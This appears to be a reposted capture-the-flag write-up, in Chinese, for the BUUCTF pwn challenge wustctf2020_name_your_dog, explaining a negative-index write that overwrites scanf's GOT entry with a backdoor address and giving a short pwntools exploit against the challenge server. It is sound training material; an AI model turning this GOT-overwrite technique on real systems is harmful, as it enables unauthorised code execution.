[BUUCTF-pwn]——wustctf2020_name_your_dog

• 題目地址:https://buuoj.cn/challenges#wustctf2020_name_your_dog

checksec看下,

在IDA中看下, 竟然有后門函數(shù),我們只需要執(zhí)行該函數(shù)就好

看完代碼發(fā)現(xiàn), 沒有什么可以溢出的地方. 唯一可以找到修改一些東西的只有, 這個函數(shù), %7s雖然限定了長度但是足夠?qū)戇M去一個地址了.

看一下它的上一級, 調(diào)用發(fā)現(xiàn)Dogs在bss段距離got表很近, 意味著我們可以修改一個got表的地址然后, 下面只要有該函數(shù)的執(zhí)行就好. 首先將目光發(fā)在了printf函數(shù)上

可是發(fā)現(xiàn),printf距離Dogs的距離不是8 的倍數(shù), 發(fā)現(xiàn)由于循環(huán), __isoc99_scanf 函數(shù)也會執(zhí)行. 碰巧距離剛好是8 的倍數(shù)-56 = 8 * (-7)

exploit

from pwn import * p = remote("node3.buuoj.cn",29805) #p = process("./wustctf2020_name_your_dog") shell = 0x080485CB p.sendlineafter(">",'-7') p.sendlineafter("Give your name plz: ",p32(shell))p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——wustctf2020_name_your_dog的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。